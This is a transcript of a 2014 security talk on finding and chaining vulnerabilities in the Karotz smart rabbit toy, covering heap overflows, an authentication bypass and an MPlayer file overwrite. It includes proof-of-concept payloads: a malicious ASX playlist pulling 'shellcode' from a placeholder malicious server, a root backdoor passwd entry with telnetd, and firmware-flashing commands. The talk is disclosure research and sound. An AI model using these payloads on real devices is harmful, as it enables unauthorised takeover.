Hacking an Internet Enabled Lagomorph

Transcript

1. 10/09/2014 Hacking an Internet Enabled Lagomorph

2. Who am I? ▪ Alex Chapman (noxrnet) ▪ Vulnerability Researcher

   at Context Information Security – Specialise in Reverse Engineering, Vulnerability Discovery and Exploitation 10/09/2014 @noxrnet – New found interest in embedded (IoT) devices • Hacked your light bulbs

3. I feel I have to explain ▪ We set up

   an evening at work to hack the Internet of all the Things – IP Cameras – Light bulbs – Office peripherals – Toys ▪ The stage was set – Beer – Pizza – Old school hacker tunes 10/09/2014

4. The results: Device Status IP Camera Light Bulb NAS Printer

   Rabbit 10/09/2014

5. This talk ▪ I hope a number of you will

   understand my situation here – How could I, in any good faith, let a 9.6-inch rabbity thing survive unscathed??? ▪ This talk will outline my descent into madness, and more precisely how that process led to identifying and exploiting 4+ (the exact number escapes me at the moment) vulnerabilities in the Karotz Interactive Smart Rabbit (and associated libraries) – This is not a piece of ground-breaking research, more a chronicle of one mans mission to nail that f’ing rabbit once and for all 10/09/2014

6. Introducing Karotz ▪ Karotz the “Smart Companion” is a “stylish

   and communicative rabbit, connected to internet” – … really! ▪ More importantly, Karotz is – An ARM based embedded device • Samsung S3C2440 ARM9 processor • 2GB Hynix Flash • 512MB Hynix SDRAM • WiFi enabled – Linux based 10/09/2014

7. Prior Art ▪ I’m not the first to attempt to

   compromise this particular lagomorph… bizarrely ▪ Daniel Crowley of Trustwave SpiderLabs – CVE-2013-4867 – Python Module Hijacking • DLL Hijacking for Python • Locally exploitable requiring physical access to the rabbit – CVE-2013-4868 – Cleartext Communications • No SSL between the rabbit and the server • Useful for intercepting comms ▪ https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-021.txt 10/09/2014

8. Initial Attack Surface Survey 10/09/2014

9. Starting at the Start – Getting the Firmware ▪ Firmware

   updates downloaded from Karotz website – Update image provided to device via USB • With signed / encrypted blobs – Some binaries and libraries available from unencrypted yaffs file system images – Root file system GPG encrypted • However, can be downloaded unencrypted from the Karotz website 10/09/2014

10. On / Off Target Debugging ▪ On target debugging allows

    you to find and ultimately debug vulnerabilities on the target device – Requires a method of code execution on the device before you can start ▪ Off target debugging allows you to find and debug vulnerabilities in an emulated environment – Can start to identify vulnerabilities without a pre-existing method of code execution – May not be representative of the actual device • Memory layout • Exploit protection mechanisms • Etc. 10/09/2014

11. Raspberry Pi for Rabbity Emulation ▪ ARM11 based processor –

    Binary compatibility with Karotz ARM9 compiled binaries ▪ Extract interesting binaries and libraries from the Karotz firmware image and run them on the Raspberry Pi – Chrooted execution ▪ Great way to start looking for vulnerabilities where interactive access to the target device is not available 10/09/2014

12. Vuln No. 1 – libmms Heap Overflow ▪ CVE-2014-2892 ▪

    Identified by simple fuzzing and instrumentation against Music Play Daemon 0.15.0 on the Raspberry Pi ▪ Allows full corruption of process heap 10/09/2014

13. 10/09/2014 Libmms/src/mmsh.c 234 static int get_answer (mms_io_t *io, mmsh_t *this)

    { 235 236 int done, len, linenum; 237 char *features; 238 239 done = 0; len = 0; linenum = 0; 240 this->stream_type = MMSH_UNKNOWN; 241 242 while (!done) { 243 244 if (io_read(io, this->s, &(this->buf[len]), 1) != 1) { 245 lprintf("end of stream\n"); 246 return 0; 247 } 248 249 if (this->buf[len] == '\012') { ... 312 } else { 313 len ++; 314 } 315 }

14. libmms Heap Overflow ▪ Heap memory corruption – Pure C

    application with little to no interesting data in the heap • No vtables, function pointers, object pointers • Very boring! – A little messy and would take time to craft a reliable exploit ▪ In the scenario of limited exploitability 10/09/2014

15. Limitations to Off Target Debugging ▪ Not viable where applications

    expect to interact with specific hardware ▪ Karotz Controller application – Responsible for processing connections from port 9123/tcp – Interacts with hardware before entering the running loop • Exits on hardware interaction error! – Difficult to emulate in an off target environment 10/09/2014

16. On Target Debugging ▪ Update the device firmware to allow

    us remote root access – Unfortunately firmware updates are signed! ▪ Usual update process decrypts local firmware, or downloads unencrypted firmware from the website, and flashes it to the device – Uses on device binaries flash_eraseall and nandwrite to do this ▪ Can we manually perform this process to allow the running of modified firmware? – Use CVE-2013-4867 to modify the device firmware 10/09/2014

17. Python Module Hijacking ▪ Create a new rootfs.img.gz firmware image

    with the following modifications – /karotz/etc/passwd • ctx:$1$1b7zwtVU$SsmyTuLTqYkYEKX5GdyFh/:0:0:ctx:/usr/karotz:/bin/bash – /karotz/etc/inetd.conf • telnet stream tcp nowait root /sbin/telnetd telnetd 10/09/2014 import os os.system("LD_LIBRARY_PATH=/tmp /tmp/madplay /tmp/16.mp3") os.system("echo 1 > /mnt/usbkey/ctx.run") os.system("/sbin/flash_eraseall /dev/mtd2") os.system("/sbin/nandwrite -pm /dev/mtd2 /mnt/usbkey/ctx/rootfs.img.gz") os.system("LD_LIBRARY_PATH=/tmp /tmp/madplay /tmp/16.mp3")

18. We’re in! 10/09/2014

19. Cross Compiling Tool Chains??? ▪ Unfortunately Karotz does not ship

    with debugging tools ☹ ▪ We need to cross compile any tool we may need for ARM9 – gdb / gdbserver – strace – Etc. ▪ Buildroot to the rescue – http://buildroot.uclibc.org/ – Set of make files used to build embedded system images – Creates a tool chain which can be used to cross compile individual applications 10/09/2014

20. Now what? 10/09/2014

21. My Very First Google Protocol Buffers ▪ “Protocol buffers are

    Google's language-neutral, platform- neutral, extensible mechanism for serializing structured data” – https://developers.google.com/protocol-buffers/ ▪ Karotz communicates with the backend servers using protocol buffers – Without encryption of any kind! – Thank you Dan Crowley for pointing that one out ▪ Can we MitM the traffic to replace the need for the backend Karotz server? 10/09/2014

22. Protocol Buffers ▪ Simple tag length based protocol ▪ Discrete

    messages sent and received ▪ Messages defined using “c” like structures 10/09/2014 message Person { required string name = 1; required int32 age = 2; optional string email = 3; } message Person { name = "Karotz"; age = 7; email = "[email protected]"; } (2, 1, 6, "Karotz") (0, 2, 7) (2, 3, 17, "[email protected]") '\x0a\x06Karotz\x10\x07\x1a\[email protected]'

23. Dissecting Protocol Buffers on the Wire 10/09/2014

24. Protocol Buffers reverse non-determinism 10/09/2014

25. Replacing the Pesky Karotz Server ▪ Each boot Karotz registers

    with the backend server – Messages • HELO • Application registration • Timezone configuration • Ping / Pong ▪ Simple protocol buffers messages which can be easily emulated – Karotz seems to ignore most of the returned values anyway! ▪ Now we can work offline, even when the Karotz servers go down – Which seems to happen a fair bit! 10/09/2014

26. Vuln No. 2 – Controller Heap Overflow 10/09/2014 ▪ Identified

    via manual authentication attempts ▪ Allows full corruption of process heap

27. Controller Heap Overflow ▪ Heap memory corruption good – A

    little messy and would take time to craft a reliable exploit ▪ Let’s keep looking 10/09/2014 id: "HeapCrashPOC" interactiveMode { action: START interactiveId:"AAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ttl: -2 access: "5" }

28. Vuln No. 3 – Authentication Bypass ▪ Identified via binary

    reverse engineering – (Probably observed earlier, but unaware of the consequence) ▪ Allows access to all Karotz features unauthenticated from the local network! 10/09/2014

29. Authentication Bypass ▪ During normal authentication the client application authenticates

    to the Karotz server – The Karotz server in turn pushes an interactiveId to both the rabbit controller service and client which, is then used as a shared secret ▪ The authentication function checks the provided interactiveId with the stored interactiveId to determine if the client is authorised 10/09/2014

30. Authentication Bypass ▪ However, upon startup the controller service initialises

    the interactiveId variable to an empty string ▪ The authentication function checks the provided interactiveId with the stored interactiveId to determine if the client is authorised 10/09/2014 id: "AuthBypassPOC" interactiveId: "" "" == ""

31. Authentication Bypass – Final Step 10/09/2014

32. Demo! 10/09/2014

33. Authentication Bypass ▪ Authentication bypass good – But does not

    directly lead to code execution ▪ Getting closer, but more work required 10/09/2014

34. Increasing the Attack Surface ▪ The authentication bypass vulnerability opens

    up the attack surface ▪ We now have access to – Audio – Microphone – Video Camera – Ears(!) ▪ Can we identify further vulnerabilities in these services? 10/09/2014

35. Exploiting Packaged Applications ▪ Extended functionality (music, video, ears) implemented

    via shared libraries and packaged applications ▪ Music playing functionality handed off to Mplayer via a call to system() – Initial hope for command injection, however it was not vulnerable • More by accident than design I believe – However, the version of Mplayer packaged is version 1.1 • Known vulnerabilities! 10/09/2014

36. Vuln No 4. – MPlayer Remote File Overwrite ▪ OSVDB

    97351 ▪ Advisory released September 2013 ▪ No public exploit available – Vulnerability advisories sparse • “MPlayer contains a flaw that may allow a malicious remote server to overwrite a file on the victim's system” • “A vulnerability has been reported in MPlayer, which can be exploited by malicious people to manipulate certain data.” 10/09/2014

37. Use the Source ▪ Vulnerabilities fixed in version 1.1.1 ▪

    Diffing with the vulnerable 1.1 version shows very few changes – Majority of changes focus on asx playlist processing 10/09/2014

38. ASX Parser 10/09/2014 static void asx_parse_param(ASX_Parser_t* parser, char** attribs, play_tree_t*

    pt) { char *name,*val; name = asx_get_attrib("NAME",attribs); if(!name) { asx_warning_attrib_required(parser,"PARAM" ,"NAME" ); return; } val = asx_get_attrib("VALUE",attribs); if(m_config_get_option(mconfig,name) == NULL) { mp_msg(MSGT_PLAYTREE,MSGL_WARN,"Found unknown param in asx: %s",name); if(val) mp_msg(MSGT_PLAYTREE,MSGL_WARN,"=%s\n",val); else mp_msg(MSGT_PLAYTREE,MSGL_WARN,"\n"); return; } play_tree_set_param(pt,name,val); free(name); free(val); } Mplayer-1.1/asxparser.c static void asx_parse_param(ASX_Parser_t* parser, char** attribs, play_tree_t* pt) { char *name = NULL,*val = NULL; name = asx_get_attrib("NAME",attribs); if(!name) { asx_warning_attrib_required(parser,"PARAM" ,"NAME" ); return; } val = asx_get_attrib("VALUE",attribs); if(m_config_get_option(mconfig,name) == NULL) { mp_msg(MSGT_PLAYTREE,MSGL_WARN,"Found unknown param in asx: %s",name); if(val) mp_msg(MSGT_PLAYTREE,MSGL_WARN,"=%s\n",val); else mp_msg(MSGT_PLAYTREE,MSGL_WARN,"\n"); goto err_out; } mp_msg(MSGT_PLAYTREE, MSGL_ERR, "Support for specifying parameters in playlists has been disabled.\n"); // play_tree_set_param(pt,name,val); err_out: free(name); free(val); } Mplayer-1.1.1/asxparser.c

39. Malicious ASX ▪ ASX a Microsoft specification, but doesn’t include

    these elements! – Dumpstream – Enable dumping of the currently playing stream – Dumpfile – Specify where to dump the stream to 10/09/2014 <asx version="3.0"> <repeat count="2"> <title>Exploit</title> <param name="dumpstream" value="true" /> <param name="dumpfile" value="/usr/karotz/file_to_overwrite" /> <entry> <title>ShellCode</title> <ref href="http://maliciouserver/shell" /> </entry> </repeat> </asx>

40. File Overwrite to Code Execution ▪ Several limitations – Can’t

    overwrite a running process binary – / mounted read-only • /karotz – Read-write • /usr – Read-write • /var – Read-write – Need to be able to run the overwritten file for code execution 10/09/2014

41. File Overwrite to Code Execution - Options ▪ Overwrite inetd.conf?

    – Requires a reboot ▪ Overwrite a library? – Could have unexpected consequences ▪ Overwrite a Karotz specific daemon? – Could break things 10/09/2014

42. Putting it All Together 1. Crash the controller service to

    reset the interactiveId parameter 2. Use the authentication bypass vulnerability to get Mplayer to load a malicious asx playlist 3. Overwrite a module which is loaded by the controller service with our desired code 4. Crash the controller service again 5. Profit! 10/09/2014

43. Demo – Unauthenticated Ear Wiggling 10/09/2014

44. So what? ▪ Let’s be honest, this wasn’t really about

    the outcome – Even though I did find a few l33t 0dayz ▪ The journey was the point of the project – I encourage all of you out there, whether seasoned VR guys or hobbyists to pick a project and run with it 10/09/2014

45. Mitigating the Issues ▪ If you have a Karotz (I

    have several) you may be concerned about what I have presented here! ▪ All issues have been reported to the vendor… several times – 4 months have passed since the initial vulnerability report – The vendor has still not confirmed if any patches will be issued • The devices appear to no longer be sold • And the servers are offline quite often • Abondonware? ▪ In lieu of patches – Firewall your rabbit! – I also recommend implementing your own Karotz server 10/09/2014

46. Lessons Learned 10/09/2014 ▪ Hacking toy devices can be fun!

    – Security is often an after-thought (if it is considered at all) ▪ Just because someone has already looked at a device doesn’t mean there isn’t more to find – Different focuses often lead to different results ▪ Still plenty of attack surface left which has not been assessed if anyone fancies picking up the baton?

47. Questions? @noxrnet